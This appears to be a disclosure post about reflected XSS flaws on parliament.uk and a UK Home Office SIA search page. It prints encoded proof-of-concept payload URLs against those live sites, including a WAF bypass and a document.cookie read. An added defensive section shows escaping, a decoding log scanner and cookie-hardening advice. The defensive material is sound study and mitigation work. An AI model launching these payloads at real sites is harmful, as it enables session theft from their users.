4tt4ck3r Finds Flaw in UK Government Websites

Iranian hacker 4tt4ck3r has previously found reflected XSS (cross-site scripting) vulnerabilities in UK government websites, as follows:

Parliament of the United Kingdom

The vulnerable website address is: https://www.parliament.uk/search/results/
The URL of the website changes to this form: https://www.parliament.uk/search/results/?q=HellO (or any other value)

Scripts can be injected through this vulnerability using different bypass methods. With the 'head' bypass method, the script before encoding looks like:

">head<script>alert('HellO')</script>head">"

The encoded script looks like:

%22%3E%68%65%61%64%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%48%65%6C%6C%4F%27%29%3C%2F%73%63%72%69%70%74%3E%68%65%61%64%22%3E%22%00

The encoded script as sent in this website's URL looks like:

https://www.parliament.uk/search/results/?q=%2522%253E%2568%2565%2561%2564%253C%2573%2563%2572%2569%2570%2574%253E%2561%256C%2565%2572%2574%2528%2527%2548%2565%256C%256C%254F%2527%2529%253C%252F%2573%2563%2572%2569%2570%2574%253E%2568%2565%2561%2564%2522%253E%2522%2500&__cf_waf_tk__=007990002B2cYZgm1bcmnxNL4Ep2na0Wa66k

Find details of the vulnerability here

The Security Industry Authority (SIA) of the UK Home Office

The vulnerable page of this website is: http://www.sia.homeoffice.gov.uk/Pages/SearchResults.aspx

The URL of the website can be changed like this example: http://www.sia.homeoffice.gov.uk/Pages/SearchResults.aspx?Search=4TT4CK3R
Running the script against this website looks like:

http://www.sia.homeoffice.gov.uk/Pages/SearchResults.aspx?Search=%22%22/%3Ehead%3Cscript%3Ealert%28%274TT4CK3R%27%29%3C/script%3Ehead%3C/%22%22

This website also allows cookies to be captured, as follows:

http://www.sia.homeoffice.gov.uk/Pages/SearchResults.aspx?Search=%22%22/%3Ehead%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ehead%3C/%22%22

Find details of the vulnerability here
The vulnerability was discovered by: Dark Killer; the team is: Dark Killer, 4TT4CK3R, RxM_BR, Sina Titan
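Both findings above share one root cause: a search page copies the `q` / `Search` parameter into its HTML verbatim, so a value that closes the surrounding attribute and opens a `<script>` tag is executed by the browser, and percent-encoding the payload once (SIA) or twice (the parliament.uk URL uses `%2522`, which decodes to `%22` and then to `"`) only hides it from naive filters. The following Python is an added example, not code from the post or from either website; the search-page template, the hypothetical `render_unsafe` / `render_safe` functions and the access-log lines are all constructed for illustration. It shows the defective reflection beside its hardened form (HTML-entity encoding of the reflected value) and a detection routine that fully decodes query values from web-server logs before looking for script tags or `document.cookie` reads, which is why the double-encoded parliament.uk style of request is still caught.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed template standing in for a search results page that echoes the
# query back to the user (the pattern behind both findings on this page).
HTML_TEMPLATE = '<h2>Results for "{q}"</h2>'

# Constructed payload in the same shape as the post's 'head' bypass script.
PAYLOAD = '">head<script>alert(\'HellO\')</script>head">"'


def render_unsafe(q: str) -> str:
    """Defective pattern: the raw query lands inside the markup unchanged."""
    return HTML_TEMPLATE.format(q=q)


def render_safe(q: str) -> str:
    """Hardened pattern: entity-encode the value for an HTML context.

    quote=True also turns " and ' into entities, so a value cannot close the
    attribute it is reflected into.
    """
    return HTML_TEMPLATE.format(q=html.escape(q, quote=True))


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode repeatedly until the value stops changing.

    A single decode of a double-encoded value (%2522 -> %22) still looks
    harmless; decoding until stable exposes what the browser will render.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


# Heuristic markers of reflected-XSS probing (script tags, script URLs,
# cookie reads); a real deployment would add more patterns and tune them.
SUSPICIOUS = re.compile(r"<\s*/?\s*script\b|javascript\s*:|document\.cookie", re.I)

REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def scan_log(log_text: str):
    """Return (line_no, param, decoded_value) for each suspicious query value."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        # parse_qsl decodes one layer; fully_decode strips any remaining ones.
        for param, raw in parse_qsl(query, keep_blank_values=True):
            decoded = fully_decode(raw)
            if SUSPICIOUS.search(decoded):
                hits.append((line_no, param, decoded))
    return hits


# Constructed access-log sample (placeholder addresses from the RFC 5737 test ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search/results/?q=HellO HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search/results/?q=%2522%253E%253Cscript%253Ealert%2528%2527HellO%2527%2529%253C%252Fscript%253E HTTP/1.1" 200 5203
198.51.100.9 - - [01/Jan/2024:10:00:03 +0000] "GET /Pages/SearchResults.aspx?Search=%22%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E HTTP/1.1" 200 4890
198.51.100.9 - - [01/Jan/2024:10:00:04 +0000] "GET /Pages/SearchResults.aspx?Search=passport%20renewal HTTP/1.1" 200 4711
"""


if __name__ == "__main__":
    print("unsafe:", render_unsafe(PAYLOAD))
    print("safe:  ", render_safe(PAYLOAD))
    for line_no, param, decoded in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {param}={decoded!r}")
```

Output encoding in the template is the fix for the reflection itself; the `document.cookie` variant on the SIA page is additionally blunted by marking session cookies `HttpOnly`, which keeps them out of reach of injected script even where an encoding bug remains. The log scan deliberately decodes before matching, because a filter that inspects the raw `%2522%253E...` string never sees a `<` character.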
